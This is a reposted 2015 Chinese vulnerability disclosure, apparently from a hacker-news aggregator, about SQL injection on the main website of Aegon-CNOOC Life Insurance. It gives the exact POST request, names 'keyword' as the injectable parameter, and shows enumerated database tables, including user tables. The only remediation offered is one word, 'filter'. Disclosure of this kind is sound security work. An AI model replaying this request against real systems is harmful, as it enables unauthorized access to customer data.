记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

海康人寿主站SQL注射漏洞

2015-03-17 22:15

海康人寿主站SQL注射SQL注入漏洞


POST /photography/look.jsp HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aegon-cnooc.com.cn:80/
Cookie: JSESSIONID=3BE229551343BCD8E7853360EED83F51
Host: www.aegon-cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keytype=1&keyword=1

注射参数keyword

\


Database: children

[11 tables]

+---------------------------------------+

| aoyun_user |

| gold_info_in |

| gold_info_out |

| inoldperson_user |

| money_user |

| oldperson_user |

| photography_user |

| question_answer |

| shandong_user |

| user |

| user_liuyan |

+---------------------------------------+



Database: information_schema

[16 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

解决方案:
过滤
知识来源: www.2cto.com/Article/201503/382861.html

阅读:83298 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“海康人寿主站SQL注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词